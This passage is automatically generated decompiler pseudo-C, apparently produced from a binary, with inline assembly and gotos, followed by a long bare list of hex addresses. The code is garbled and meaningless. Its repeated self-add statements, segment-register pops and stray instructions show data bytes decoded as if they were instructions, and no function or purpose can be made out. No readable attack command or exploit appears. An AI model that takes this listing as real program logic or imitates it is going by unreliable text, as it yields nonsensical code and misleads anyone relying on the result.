				_t826 = ((_t822 |  *_t1779) - 0x00000007 |  *_t1547) - 0x21;
				_t1780 = _t1779 +  *((intOrPtr*)(_t1734 + 0x65));
				 *_t826 =  *_t826 + _t826;
				if( *_t826 >= 0) {
					asm("outsd");
					_t1771 = _t1771 - 1;
					 *_t826 =  *_t826 + _t826;
					_t1734 = _t1734 |  *(_t1734 - 0x45);
				}
				 *_t826 =  *_t826 + _t826;
				if( *_t826 >= 0) {
					asm("outsd");
					_push(_t826);
					 *_t826 =  *_t826 + _t826;
					_t1614 = _t1614 |  *_t826;
					_push(_t1614);
				}
				 *_t826 =  *_t826 + _t826;
				_t1615 = _t1614 |  *_t826;
				 *[cs:eax] =  *[cs:eax] + _t826;
				do {
					 *_t826 =  *_t826 + _t826;
					asm("fiadd word [eax]");
					_t826 = _t826 -  *_t1615;
					 *_t826 =  *_t826 + _t826;
					 *_t1771 =  *_t1771 + _t1615;
					 *_t1615 =  *_t1615 + _t1734;
					 *_t826 =  *_t826 & _t826;
					asm("daa");
					ds = es;
					 *_t826 =  *_t826 + _t826;
					 *_t1547 =  *_t1547 + _t1734;
					 *_t1547 =  *_t1547 ^ _t826;
					 *_t1734 =  *_t1734 + _t1547;
					 *_t826 =  *_t826 + _t826;
					 *_t1780 =  *_t1780 + _t826;
					 *_t826 =  *_t826 + _t826;
					asm("adc [edx], eax");
				} while ( *_t826 < 0);
				 *_t826 =  *_t826 + _t826;
				if( *_t826 < 0) {
					 *_t1734 =  *_t1734 - _t1734;
					 *_t1734 =  *_t1734 + _t1615;
					_t828 = _t826 - 2;
					_pop(ss);
					_t1734 = _t1734 -  *_t1780;
					_t829 = _t828 -  *_t828;
					 *_t1547 =  *_t1547 + _t1734;
					 *_t1734 =  *_t1734 ^ _t829;
					 *((intOrPtr*)(_t829 + _t829)) =  *((intOrPtr*)(_t829 + _t829)) + _t829;
				} else {
					_t1541 = _t826 & 0x00000000;
					 *_t1780 =  *_t1780 + _t1541;
					if( *_t1780 >= 0) {
						_t1541 = _t1541 +  *_t1541;
					}
					 *((intOrPtr*)(_t1541 + 0x28)) =  *((intOrPtr*)(_t1541 + 0x28)) + _t1734;
				}
				_t830 = _t829 & 0x00000000;
				 *_t830 =  *_t830 + _t830;
				_pop(es);
				 *_t830 =  *_t830 + _t830;
				asm("adc [eax], ebp");
				 *_t1734 =  *_t1734 + _t1615;
				asm("outsd");
				asm("aas");
				 *_t830 =  *_t830 + _t830;
				_t1616 = _t1615 |  *_t1734;
				asm("adc al, [eax]");
				 *_t830 =  *_t830 - _t830;
				 *_t1734 =  *_t1734 + _t1616;
				_pop(ds);
				 *_t830 =  *_t830 & _t1616;
				_pop(ds);
				 *_t830 =  *_t830 + _t830;
				_push(es);
				 *_t1771 =  *_t1771 - _t1616;
				 *_t830 =  *_t830 + _t830;
				_t1617 = _t1616 |  *_t830;
				asm("adc al, 0x0");
				 *_t1780 =  *_t1780 + _t830;
				_t1548 = _t1547 -  *_t1547;
				 *_t1548 =  *_t1548 ^ _t830;
				 *((intOrPtr*)(_t830 + _t830)) =  *((intOrPtr*)(_t830 + _t830)) + _t1734;
				 *_t830 =  *_t830 + _t1617;
				 *_t830 =  *_t830 + _t830;
				asm("adc [edx], eax");
				_push(ss);
				asm("das");
				_t1781 = _t1780 |  *(_t1734 + 0x4f);
				_t831 = _t830 +  *_t830;
				if(_t831 < 0) {
					L35:
					_t833 = _t831 ^  *_t831 |  *(_t831 ^  *_t831);
					 *_t833 =  *_t833 + _t833;
					 *_t1548 =  *_t1548 + _t1734;
					 *_t1734 =  *_t1734 ^ _t833;
					 *((intOrPtr*)(_t833 + 0x6000000)) =  *((intOrPtr*)(_t833 + 0x6000000)) + _t1548;
					 *_t833 =  *_t833 + _t833;
					asm("adc [eax], ebp");
					asm("adc [eax], al");
					 *_t1781 =  *_t1781 + _t833;
					_t834 = _t833 - 6;
					if(_t834 >= 0) {
						goto L48;
					} else {
						 *_t834 =  *_t834 + _t834;
						_t1548 = _t1548 |  *(_t1734 + 0x7e);
						asm("sbb al, 0x0");
						 *_t834 =  *_t834 + _t834;
						 *_t1734 =  *_t1734 + _t1617;
						_t841 = _t834 + 0x28 -  *((intOrPtr*)(_t834 + 0x28)) - 0x1c7e06;
						goto L38;
					}
				} else {
					_push(_t1807);
					 *_t831 =  *_t831 + _t831;
					_t1548 = _t1548 |  *(_t1734 + 2);
					_t1617 = _t1793 + 0xa010000;
					if(_t1548 <= 0) {
						 *_t1734 =  *_t1734 + _t1617;
						_t2453 = _t2453 +  *_t1781;
						if( *_t1734 <= 0) {
							goto L29;
						} else {
							 *_t831 =  *_t831 + _t831;
							_t1537 = _t831 + 0x25 - 0xe27e2617;
						}
					} else {
						 *_t831 =  *_t831 + _t831;
						_push(ss);
						_t831 = _t831 + 0x0000000b | 0x00000007;
						asm("adc al, [edx]");
						 *_t1793 =  *_t1793 - _t1734;
						L29:
						 *_t831 =  *_t831 + _t831;
						_t1608 = _t1548 |  *(_t1781 + 0x21);
					}
					 *_t1537 =  *_t1537 + _t1537;
					_t841 = _t1537 + 0xfe;
					_push(es);
					_push(_t841);
					 *_t841 =  *_t841 + _t841;
					_push(es);
					if( *_t841 >= 0) {
						L38:
						_t40 = _t1734 + _t1793;
						 *_t40 =  *((intOrPtr*)(_t1734 + _t1793)) + _t841;
						asm("adc al, 0xa");
						if( *_t40 <= 0) {
							L41:
							_push(es);
							if(_t1856 <= 0) {
								goto L47;
							} else {
								 *_t841 =  *_t841 + _t841;
								_t834 = _t841 + 0xa;
								if(_t834 <= 0) {
									goto L50;
								} else {
									 *_t834 =  *_t834 + _t834;
									 *_t1734 =  *_t1734 + _t1617;
									_t836 = _t834 + 0x28 -  *((intOrPtr*)(_t834 + 0x28)) - 0x1f7e06;
									_t1858 = _t836;
									L44:
									if(_t1858 <= 0) {
										goto L51;
									} else {
										goto L45;
									}
								}
							}
						} else {
							 *_t841 =  *_t841 + _t841;
							 *_t1734 =  *_t1734 + _t1617;
							_t836 = _t841 + 0x28 -  *((intOrPtr*)(_t841 + 0x28)) - 0x1d7e08;
							 *((intOrPtr*)(_t1734 + _t1617)) =  *((intOrPtr*)(_t1734 + _t1617)) + _t836;
							_t1734 = _t1734 -  *_t1734;
							if(_t1734 <= 0) {
								L45:
								 *_t836 =  *_t836 + _t836;
								_t838 = _t836 + 0xa;
								if(_t838 <= 0) {
									L52:
									_t1734 = _t1734 -  *((intOrPtr*)(_t1734 - 0x6f));
									L53:
									_t839 = _t1617;
									_t1618 = _t838;
								} else {
									 *_t838 =  *_t838 + _t838;
									_t841 = _t838 + 0x28 -  *((intOrPtr*)(_t838 + 0x28));
									L47:
									 *_t1734 =  *_t1734 + _t1617;
									_t834 = _t841 - 0x207e06;
									_t1861 = _t834;
									L48:
									if(_t1861 <= 0) {
										_t1618 = _t1617 -  *_t834;
									} else {
										 *_t834 =  *_t834 + _t834;
										L50:
										 *((intOrPtr*)(_t1734 + _t1617)) =  *((intOrPtr*)(_t1734 + _t1617)) + _t834;
										 *_t1617 =  *_t1617 - _t1734;
										 *_t834 =  *_t834 + _t834;
										_push(es);
										_t836 = _t834 - 0x16;
										_push(es);
										 *_t1548 =  *_t1548 - _t1617;
										L51:
										 *_t1734 =  *_t1734 + _t1617;
										_t838 = _t836 -  *_t836 - 2;
										asm("adc al, 0x2a");
										goto L52;
									}
								}
							} else {
								 *_t836 =  *_t836 + _t836;
								 *_t1734 =  *_t1734 + _t1617;
								_t841 = _t836 + 0x28 -  *((intOrPtr*)(_t836 + 0x28)) - 0x1e7e06;
								_t1856 = _t841;
								goto L41;
							}
						}
					} else {
						 *_t841 =  *_t841 + _t841;
						_t831 = (_t841 |  *0xe380) + 0x28 +  *((intOrPtr*)((_t841 |  *0xe380) + 0x28));
						 *_t1548 =  *_t1548 + _t1617;
						 *_t1548 =  *_t1548 - _t831;
						 *_t831 =  *_t831 + _t831;
						_t1793 = _t1793 -  *_t831;
						_pop(_t1548);
						 *_t831 =  *_t831 + _t831;
						_t1734 = _t1734 |  *_t1781;
						 *_t831 =  *_t831 + _t831;
						_t1617 = _t1617 +  *((intOrPtr*)(_t1771 + 0x39)) |  *_t1734;
						 *((intOrPtr*)(_t831 + _t831)) =  *((intOrPtr*)(_t831 + _t831)) + _t1617;
						 *_t1734 =  *_t1734 + _t831;
						 *_t1781 =  *_t1781 + _t1548;
						 *0xa0033 =  *0xa0033 + _t1734;
						goto L35;
					}
				}
				 *_t1734 =  *_t1734 - _t1734;
				 *_t834 =  *_t834 + _t834;
				_push(es);
				_t835 = _t834 - 0x23;
				 *_t835 =  *_t835 - _t1734;
				 *_t835 =  *_t835 + _t835;
				_push(es);
				_t836 = _t835 - 0x29f7206;
				 *((intOrPtr*)(_t836 + 0x2a)) =  *((intOrPtr*)(_t836 + 0x2a)) + _t1734;
				_push(es);
				 *_t1548 =  *_t1548 - _t1618;
				 *_t836 =  *_t836 + _t836;
				_t1617 = _t1618 |  *(_t1734 + _t836);
				asm("adc al, 0x2a");
				if(_t1617 < 0) {
					goto L44;
				}
				_t838 = _t836 +  *_t836;
				if(_t838 >= 0) {
					 *((intOrPtr*)(_t838 + _t838)) =  *((intOrPtr*)(_t838 + _t838)) - _t838;
					_t1617 = _t1617 |  *_t1734;
					_t1870 = _t1617;
				}
				if(_t1870 < 0) {
					 *_t838 =  *_t838 + _t838;
					_t1548 = _t1548 |  *(_t1734 + 0x13);
					 *_t1617 =  *_t1617 ^ _t838;
					 *_t838 =  *_t838 + _t838;
					 *_t838 =  *_t838 + _t838;
					 *_t838 =  *_t838 + _t838;
					 *_t838 =  *_t838 + _t838;
					if( *_t838 < 0) {
						goto L53;
					} else {
						_t838 = _t838 +  *_t838;
						if(_t838 < 0) {
							L67:
							asm("fild dword [edx]");
							 *((intOrPtr*)(_t838 + 0x28)) =  *((intOrPtr*)(_t838 + 0x28)) + _t1734;
							 *_t1734 =  *_t1734 + _t1617;
							asm("sbb byte [edi], 0x0");
							 *((intOrPtr*)(_t1734 + _t1781 * 2)) =  *((intOrPtr*)(_t1734 + _t1781 * 2)) + _t838;
							goto L68;
						} else {
							 *_t1734 =  *_t1734 + _t1617;
							asm("sbb byte [eax+eax], 0x0");
							_t838 = _t838 + 0x72;
							asm("rol dword [edx], 0x0");
							if(_t838 < 0) {
								L68:
								asm("out 0x2, eax");
								 *((intOrPtr*)(_t838 + 0x28)) =  *((intOrPtr*)(_t838 + 0x28)) + _t1734;
								 *_t1734 =  *_t1734 + _t1617;
								 *_t838 =  *_t838 & 0x00000000;
								 *((intOrPtr*)(_t1548 + _t1781 * 2)) =  *((intOrPtr*)(_t1548 + _t1781 * 2)) + _t838;
							} else {
								 *_t1734 =  *_t1734 + _t1617;
								asm("sbb byte [0x72040000], 0xd1");
								_t838 = _t838 +  *_t838;
								if(_t838 >= 0) {
									 *_t1734 =  *_t1734 + _t1617;
									asm("sbb byte [esi], 0x0");
									L66:
									 *((intOrPtr*)(_t1734 + _t1781 * 2)) =  *((intOrPtr*)(_t1734 + _t1781 * 2)) + _t838;
									goto L67;
								}
							}
						}
					}
				}
				_pop(_t1794);
				 *_t838 =  *_t838 + _t838;
				_t842 = _t838 |  *(_t838 + 0x4000021);
				if(_t842 < 0) {
					 *_t842 =  *_t842 + _t842;
					_t842 = _t842 |  *(_t842 + 0x4000022);
					_t1734 = _t1734 -  *_t1548;
					 *_t1734 =  *_t1734 ^ _t842;
					 *_t842 =  *_t842 + _t1617;
					 *_t842 =  *_t842 + _t842;
					 *_t842 =  *_t842 + _t842;
					 *_t842 =  *_t842 + _t842;
					_t1617 = _t1617 +  *0x5e730307;
					 *_t842 =  *_t842 + _t842;
					_t1548 = _t1548 |  *(_t1734 + 2);
					asm("outsd");
				}
				_t843 = _t842 - 0x2c0a0000;
				 *_t1734 =  *_t1734 | _t843;
				asm("outsd");
				_t1772 = ss;
				 *_t843 =  *_t843 + _t843;
				_t1617 = _t1617 |  *0x2f97212;
				 *((intOrPtr*)(_t843 + 3)) =  *((intOrPtr*)(_t843 + 3)) + _t1734;
				 *_t843 =  *_t843 - _t843;
				 *_t1734 =  *_t1734 + _t1617;
				_t1781 = _t1781 +  *((intOrPtr*)(_t1548 + 0x61));
				 *_t843 =  *_t843 + _t843;
				_t1548 = _t1548 |  *(_t1734 + 3);
				 *_t1734 =  *_t1734 - _t843;
				 *_t1734 =  *_t1734 + _t1617;
				_t838 = _t843 - 0x12;
				if(_t838 < 0) {
					goto L66;
				}
				_t844 = _t838 +  *_t838;
				if(_t844 >= 0) {
					 *_t844 =  *_t844 - _t844;
				}
				 *_t1734 =  *_t1734 + _t1617;
				_t1782 = _t1781 +  *((intOrPtr*)(_t1548 + 0x61));
				 *_t844 =  *_t844 + _t844;
				_t1549 = _t1548 |  *(_t1734 + 0x2a);
				asm("sbb esi, [eax]");
				_t845 = _t844;
				 *[gs:eax] =  *[gs:eax] + _t845;
				 *_t1617 =  *_t1617 + _t1617;
				 *_t845 =  *_t845 + _t845;
				asm("adc [eax], ebp");
				 *[fs:eax] =  *[fs:eax] + _t845;
				_t1619 = _t1617 |  *_t1734;
				 *_t1794 =  *_t1794 - _t845;
				 *_t1734 =  *_t1734 + _t1619;
				 *_t845 =  *_t845 + _t845;
				 *_t845 =  *_t845 + _t845;
				_t1622 = _t1619 + _t1772[0x19] | _t1772[0x19] |  *_t1549;
				es = es;
				gs =  *((intOrPtr*)(_t1622 + 0x18));
				_pop(_t1735);
				if(_t1622 < 0) {
					 *_t845 =  *_t845 + _t845;
					_t1622 = _t1622 |  *(_t1782 + _t1735);
					_t1518 = _t845 | 0x0708212b;
					_t85 =  &(_t1772[0x400023]);
					 *_t85 = _t1772[0x400023] | _t1622;
					if( *_t85 < 0) {
						L78:
						 *_t1735 =  *_t1735 - _t1622;
						 *_t1735 =  *_t1735 + _t1622;
						asm("outsd");
						 *_t1772 =  *_t1772 | _t1735;
						_pop(_t1521);
						_t1522 = _t1521 | 0x698e0709;
						_t1549 = _t1549 ^ _t1622;
						_t1772[0xa] = _t1772[0xa] | _t1622;
						 *_t1522 =  *_t1522 + _t1522;
						_t1735 = _t1735 |  *_t1549;
						_t1525 = (_t1522 + 0x000000de |  *_t1782) - 6;
						_push(es);
						asm("outsd");
					} else {
						_t1525 = _t1518;
						if(_t1525 >= 0) {
							_t1518 =  *_t1525 * 0x6a280a00;
							_t1890 =  *_t1525 * 0x6a280a00;
							goto L78;
						}
					}
					asm("insb");
					 *_t1525 =  *_t1525 + _t1525;
					_t1549 = _t1549 | _t1525;
					asm("adc [edx+ebp], eax");
					 *_t1525 =  *_t1525 + _t1525;
					 *_t1622 =  *_t1622 + _t1525;
					_t1526 = _t1525;
					 *_t1735 =  *_t1735 + _t1526;
					 *_t1782 =  *_t1782 + _t1526;
					 *((intOrPtr*)(_t1735 + 0x58)) =  *((intOrPtr*)(_t1735 + 0x58)) + _t1735;
					 *_t1735 =  *_t1735 + _t1622;
					 *_t1526 =  *_t1526 + _t1526;
					 *_t1526 =  *_t1526 + _t1526;
					asm("adc esi, [eax]");
					_t845 = _t1526 +  *_t1526;
					_t1794 = 0xa000000;
					 *_t845 =  *_t845 + _t845;
					asm("adc [ebx], eax");
					asm("adc al, 0x28");
				}
				if (_t1890 >= 0) goto L81;
				 *_t1735 =  *_t1735 + _t1622;
				_t846 = _t845 - 0x36280208;
				 *_t846 =  *_t846 + _t846;
				_t847 = _t846 - 0x6f032a01;
				if (_t847 < 0) goto L82;
				 *_t1735 =  *_t1735 + _t1622;
				_t1736 = _t1735 |  *(_t1549 + 0x73);
				 *_t847 =  *_t847 + _t847;
				_t1623 = _t1622 |  *_t1549;
				es = es;
				if(_t1623 < 0) {
					L85:
					 *_t1736 =  *_t1736 + _t1623;
					asm("outsd");
					_t849 =  *_t847 * 0x00000000 |  *_t1782;
					_pop(es);
					if(_t849 < 0) {
						goto L91;
					} else {
						_t1516 = _t849;
						if(_t1516 < 0) {
							goto L105;
						} else {
							_t1513 =  *_t1516 * 0;
							goto L88;
						}
					}
				} else {
					_t1511 = _t847;
					if(_t1511 < 0) {
						L100:
						if (_t1907 < 0) goto L101;
						 *_t1736 =  *_t1736 + _t1623;
						asm("outsd");
						if ( *_t1736 != 0) goto L102;
						 *_t1736 =  *_t1736 + _t1623;
						asm("outsd");
						_t1513 =  *_t1511 * 0x00000000 |  *_t1782;
						_pop(es);
						if(_t1513 < 0) {
							L88:
							 *_t1736 =  *_t1736 + _t1623;
							_pop(es);
							_push(es);
							asm("outsd");
							if ( *_t1736 != 0) goto L89;
							 *_t1736 =  *_t1736 + _t1623;
							asm("outsd");
							if ( *_t1736 <= 0) goto L90;
							 *_t1736 =  *_t1736 + _t1623;
							_t1794 = _t1794 +  *[es:edi+0x77];
							 *_t1513 =  *_t1513 + _t1513;
							_t1623 = _t1623 |  *_t1513;
							 *_t1736 =  *_t1736 + _t1623;
							_t849 = _t1513 -  *_t1513 - 0x50720746;
							_t1900 = _t849;
							L91:
							if(_t1900 < 0) {
								goto L107;
							} else {
								_t1505 = _t849;
								if(_t1505 < 0) {
									 *_t1505 = _t1505 +  *_t1505;
									_push(es);
									asm("lodsb");
									_t853 =  &(_t1505[0x1c]);
									if(_t853 < 0) {
										goto L122;
									} else {
										_t1508 = _t853 &  *_t853;
										 *_t1782 =  *_t1782 + _t1508;
										_t853 = _t1508 + 0x4ba72;
										_t94 = _t853 + 0x28;
										 *_t94 =  *((intOrPtr*)(_t853 + 0x28)) + _t1736;
										_t1921 =  *_t94;
										if(_t1921 < 0) {
											 *_t1736 =  *_t1736 + _t1623;
											 *((intOrPtr*)(_t853 + _t853)) =  *((intOrPtr*)(_t853 + _t853)) - _t1549;
											goto L126;
										} else {
											_t1509 = _t853 &  *_t853;
											 *_t1782 =  *_t1782 + _t1509;
											_t1623 = _t1623 +  *_t1509;
											 *[ss:eax] =  *[ss:eax] + _t1509;
											_push(es);
											_t851 = _t1509 - 0x722a0302;
											goto L117;
										}
									}
								} else {
									_t851 =  *_t1505 * 0x00000000 |  *_t1782;
									_pop(es);
									_t1794 = _t1794 + _t1772[0x1d];
									_t1902 = _t1794;
									goto L94;
								}
							}
						} else {
							_t853 = _t1513;
							if(_t853 >= 0) {
								_t1516 =  *_t853 * 0;
								L105:
								_t853 = _t1516 |  *_t1782;
								_t849 = _t853 +  *_t1772;
								L107:
								_pop(es);
								asm("outsd");
								 *_t849 =  *_t849 - _t849;
								 *_t1736 =  *_t1736 + _t1623;
								 *_t1623 =  *_t1623 - _t1623;
								 *_t849 =  *_t849 + _t849;
								_push(es);
								_t850 = _t849 -  *_t849;
								 *_t850 =  *_t850 + _t850;
								asm("adc esi, [eax]");
								_t851 = _t850 + 0x7f00;
								L108:
								 *_t851 =  *_t851 + _t851;
								 *_t1549 =  *_t1549 + _t1623;
								 *_t851 =  *_t851 + _t851;
								asm("adc [ebx], eax");
								if( *_t851 < 0) {
									L94:
									if (_t1902 > 0) goto L95;
									 *_t1736 =  *_t1736 + _t1623;
									 *_t851 =  *_t851 - _t1549;
									 *_t1736 =  *_t1736 + _t1623;
									asm("outsd");
									if ( *_t1736 >= 0) goto L97;
									 *_t1736 =  *_t1736 + _t1623;
									asm("outsd");
									_t851 =  *_t851 * 0x00000000 |  *_t1782;
									_pop(es);
									if(_t851 < 0) {
										L117:
										_t1736 = _t1736 -  *(_t1736 - 0x34);
										_t1923 = _t1736;
										goto L118;
									} else {
										_t851 = _t851;
										if(_t851 < 0) {
											L118:
											if(_t1923 < 0) {
												goto L108;
											} else {
												_t853 = _t851;
												_t1924 = _t853;
												if(_t1924 < 0) {
													L126:
													 *_t853 =  *_t853 + _t853;
													 *_t1736 =  *_t1736 + _t1623;
													_t1736 = _t1736 |  *(_t1736 - 0x34);
												} else {
													_t1736 = _t853;
													 *_t853 =  *_t853 + _t853;
													 *0x25a20416 =  *0x25a20416 + _t1807;
													L122:
													_t1507 = _t853 & 0x04dc7217;
												}
											}
										} else {
											_t1511 =  *_t851 * 0x00000000 |  *_t1782;
											_pop(es);
											_t1794 = _t1794 + _t1772[0x1d];
											 *_t1511 =  *_t1511 + _t1511;
											_t1623 = _t1623 |  *_t1511;
											_t1907 = _t1623;
											goto L100;
										}
									}
								} else {
									_t853 = _t851;
									if (_t853 < 0) goto L120;
									 *_t1736 =  *_t1736 - _t853;
								}
							}
						}
					} else {
						_t847 =  *_t1511 * 0x00000000 |  *_t1782;
						_pop(es);
						_push(es);
						asm("outsd");
						if (_t847 == 0) goto L85;
						goto L85;
					}
				}
				asm("int3");
			}


































































































                                                                                        0x01364e14
                                                                                        0x01364e14
                                                                                        0x01364e14
                                                                                        0x01364e16
                                                                                        0x01364e18
                                                                                        0x01364e1a
                                                                                        0x01364e1f
                                                                                        0x01364e20
                                                                                        0x01364e22
                                                                                        0x01364e24
                                                                                        0x01364e2a
                                                                                        0x01364e2c
                                                                                        0x01364e2e
                                                                                        0x01364e30
                                                                                        0x01364e32
                                                                                        0x01364e34
                                                                                        0x01364e3e
                                                                                        0x01364e40
                                                                                        0x01364e43
                                                                                        0x01364e45
                                                                                        0x01364e4b
                                                                                        0x01364e4d
                                                                                        0x01364e4f
                                                                                        0x01364e51
                                                                                        0x01364e53
                                                                                        0x01364e55
                                                                                        0x01364e5a
                                                                                        0x01364e61
                                                                                        0x01364e63
                                                                                        0x01364e64
                                                                                        0x01364e66
                                                                                        0x01364e6c
                                                                                        0x01364e6d
                                                                                        0x01364e6f
                                                                                        0x01364e75
                                                                                        0x01364e78
                                                                                        0x01364e79
                                                                                        0x01364e7b
                                                                                        0x01364e7e
                                                                                        0x01364e86
                                                                                        0x01364e88
                                                                                        0x01364e8c
                                                                                        0x01364e8d
                                                                                        0x01364e8f
                                                                                        0x01364e91
                                                                                        0x01364e93
                                                                                        0x01364e96
                                                                                        0x01364e98
                                                                                        0x01364e9c
                                                                                        0x01364e9e
                                                                                        0x01364ea0
                                                                                        0x01364ea2
                                                                                        0x01364ea7
                                                                                        0x01364ea9
                                                                                        0x01364eae
                                                                                        0x01364eb3
                                                                                        0x01364eb8
                                                                                        0x01364eba
                                                                                        0x01364ebe
                                                                                        0x01364ec0
                                                                                        0x01364ec1
                                                                                        0x01364ec1
                                                                                        0x01364ec2
                                                                                        0x01364ec4
                                                                                        0x01364ec6
                                                                                        0x01364ec8
                                                                                        0x01364ecb
                                                                                        0x01364ecd
                                                                                        0x01364ecf
                                                                                        0x01364ed1
                                                                                        0x01364ed3
                                                                                        0x01364ed6
                                                                                        0x01364ed7
                                                                                        0x01364ed8
                                                                                        0x01364ed9
                                                                                        0x01364edc
                                                                                        0x01364ede
                                                                                        0x01364ee1
                                                                                        0x01364ee3
                                                                                        0x01364ee5
                                                                                        0x01364ee8
                                                                                        0x01364eea
                                                                                        0x01364eea
                                                                                        0x01364eeb
                                                                                        0x01364eed
                                                                                        0x01364eef
                                                                                        0x01364ef5
                                                                                        0x01364ef7
                                                                                        0x01364efd
                                                                                        0x01364f02
                                                                                        0x01364f04
                                                                                        0x01364f06
                                                                                        0x01364f08
                                                                                        0x01364f0a
                                                                                        0x01364f10
                                                                                        0x01364f15
                                                                                        0x01364f18
                                                                                        0x01364f1e
                                                                                        0x01364f20
                                                                                        0x01364f22
                                                                                        0x01364f24
                                                                                        0x01364f25
                                                                                        0x01364f26
                                                                                        0x01364f28
                                                                                        0x01364f2b
                                                                                        0x01364f2d
                                                                                        0x01364f2f
                                                                                        0x01364f30
                                                                                        0x01364f34
                                                                                        0x01364f35
                                                                                        0x01364f36
                                                                                        0x01364f3b
                                                                                        0x01364f3d
                                                                                        0x01364f3f
                                                                                        0x01364f40
                                                                                        0x01364f43
                                                                                        0x01364f44
                                                                                        0x01364f45
                                                                                        0x01364f47
                                                                                        0x01364f4a
                                                                                        0x01364f4c
                                                                                        0x01364f52
                                                                                        0x01364f54
                                                                                        0x01364f56
                                                                                        0x01364f5b
                                                                                        0x01364f5d
                                                                                        0x01364f5f
                                                                                        0x01364f61
                                                                                        0x01364f63
                                                                                        0x01364f64
                                                                                        0x01364f65
                                                                                        0x01364f66
                                                                                        0x01364f68
                                                                                        0x01364f6a
                                                                                        0x01364f6d
                                                                                        0x01364f6d
                                                                                        0x01364f6f
                                                                                        0x01364f6f
                                                                                        0x01364f6f
                                                                                        0x01364f74
                                                                                        0x01364f76
                                                                                        0x01364f78
                                                                                        0x01364f7a
                                                                                        0x01364f7b
                                                                                        0x01364f7f
                                                                                        0x01364f80
                                                                                        0x01364f82
                                                                                        0x01364f85
                                                                                        0x01364f87
                                                                                        0x01364f88
                                                                                        0x01364f88
                                                                                        0x01364f89
                                                                                        0x01364f8b
                                                                                        0x01364f8d
                                                                                        0x01364f93
                                                                                        0x01364f99
                                                                                        0x01364f9b
                                                                                        0x01364f9b
                                                                                        0x01364f9d
                                                                                        0x01364f9d
                                                                                        0x01364f9e
                                                                                        0x01364fa0
                                                                                        0x01364fa2
                                                                                        0x01364fa4
                                                                                        0x01364fa8
                                                                                        0x01364fab
                                                                                        0x01364fb0
                                                                                        0x01364fb1
                                                                                        0x01364fb4
                                                                                        0x01364fb6
                                                                                        0x01364fba
                                                                                        0x01364fbc
                                                                                        0x01364fbf
                                                                                        0x01364fc1
                                                                                        0x01364fc3
                                                                                        0x01364fc4
                                                                                        0x01364fc5
                                                                                        0x01364fc7
                                                                                        0x01364fc7
                                                                                        0x01364fca
                                                                                        0x01364fcc
                                                                                        0x01364fce
                                                                                        0x01364fcf
                                                                                        0x01364fd0
                                                                                        0x01364fd2
                                                                                        0x01364fd4
                                                                                        0x01364fd4
                                                                                        0x01364fd5
                                                                                        0x01364fd7
                                                                                        0x01364fd9
                                                                                        0x01364fda
                                                                                        0x01364fda
                                                                                        0x01364fdd
                                                                                        0x01364fe1
                                                                                        0x01364fe3
                                                                                        0x01364fe5
                                                                                        0x01364fe7
                                                                                        0x01364fe9
                                                                                        0x01364feb
                                                                                        0x01364fec
                                                                                        0x01364fed
                                                                                        0x01364fef
                                                                                        0x01364ff1
                                                                                        0x01364ff3
                                                                                        0x01364ff5
                                                                                        0x01364ff7
                                                                                        0x01364ff9
                                                                                        0x01364ffb
                                                                                        0x01364ffb
                                                                                        0x01364fff
                                                                                        0x01365001
                                                                                        0x0136502b
                                                                                        0x0136502e
                                                                                        0x01365030
                                                                                        0x01365032
                                                                                        0x01365033
                                                                                        0x01365035
                                                                                        0x01365037
                                                                                        0x01365039
                                                                                        0x0136503b
                                                                                        0x01365003
                                                                                        0x01365003
                                                                                        0x01365005
                                                                                        0x01365007
                                                                                        0x01365009
                                                                                        0x01365009
                                                                                        0x0136500a
                                                                                        0x0136500a
                                                                                        0x0136503c
                                                                                        0x0136503e
                                                                                        0x01365040
                                                                                        0x01365041
                                                                                        0x01365043
                                                                                        0x01365047
                                                                                        0x01365049
                                                                                        0x0136504a
                                                                                        0x0136504b
                                                                                        0x0136504d
                                                                                        0x0136504f
                                                                                        0x01365051
                                                                                        0x01365054
                                                                                        0x01365056
                                                                                        0x01365057
                                                                                        0x01365059
                                                                                        0x0136505a
                                                                                        0x0136505c
                                                                                        0x0136505d
                                                                                        0x0136505f
                                                                                        0x01365061
                                                                                        0x01365063
                                                                                        0x01365065
                                                                                        0x01365067
                                                                                        0x01365069
                                                                                        0x0136506b
                                                                                        0x0136506f
                                                                                        0x01365071
                                                                                        0x01365073
                                                                                        0x01365075
                                                                                        0x01365076
                                                                                        0x01365077
                                                                                        0x0136507a
                                                                                        0x0136507c
                                                                                        0x013650f1
                                                                                        0x013650f3
                                                                                        0x013650f5
                                                                                        0x013650f7
                                                                                        0x013650f9
                                                                                        0x013650fb
                                                                                        0x01365101
                                                                                        0x01365103
                                                                                        0x01365105
                                                                                        0x01365107
                                                                                        0x01365109
                                                                                        0x0136510b
                                                                                        0x00000000
                                                                                        0x0136510d
                                                                                        0x0136510d
                                                                                        0x0136510f
                                                                                        0x01365112
                                                                                        0x01365113
                                                                                        0x01365119
                                                                                        0x0136511b
                                                                                        0x00000000
                                                                                        0x0136511b
                                                                                        0x0136507e
                                                                                        0x0136507e
                                                                                        0x0136507f
                                                                                        0x01365081
                                                                                        0x01365084
                                                                                        0x0136508a
                                                                                        0x013650ae
                                                                                        0x013650b0
                                                                                        0x013650b2
                                                                                        0x00000000
                                                                                        0x013650b4
                                                                                        0x013650b4
                                                                                        0x013650b8
                                                                                        0x013650b8
                                                                                        0x0136508c
                                                                                        0x0136508c
                                                                                        0x01365090
                                                                                        0x01365091
                                                                                        0x01365093
                                                                                        0x01365095
                                                                                        0x01365097
                                                                                        0x01365097
                                                                                        0x01365099
                                                                                        0x01365099
                                                                                        0x013650bd
                                                                                        0x013650bf
                                                                                        0x013650c1
                                                                                        0x013650c2
                                                                                        0x013650c3
                                                                                        0x013650c5
                                                                                        0x013650c6
                                                                                        0x01365120
                                                                                        0x01365120
                                                                                        0x01365120
                                                                                        0x01365123
                                                                                        0x01365125
                                                                                        0x01365144
                                                                                        0x01365144
                                                                                        0x01365145
                                                                                        0x00000000
                                                                                        0x01365147
                                                                                        0x01365147
                                                                                        0x01365149
                                                                                        0x0136514b
                                                                                        0x00000000
                                                                                        0x0136514d
                                                                                        0x0136514d
                                                                                        0x01365153
                                                                                        0x01365155
                                                                                        0x01365155
                                                                                        0x01365157
                                                                                        0x01365157
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01365157
                                                                                        0x0136514b
                                                                                        0x01365127
                                                                                        0x01365127
                                                                                        0x0136512d
                                                                                        0x0136512f
                                                                                        0x01365134
                                                                                        0x01365137
                                                                                        0x01365139
                                                                                        0x01365159
                                                                                        0x01365159
                                                                                        0x0136515b
                                                                                        0x0136515d
                                                                                        0x0136517f
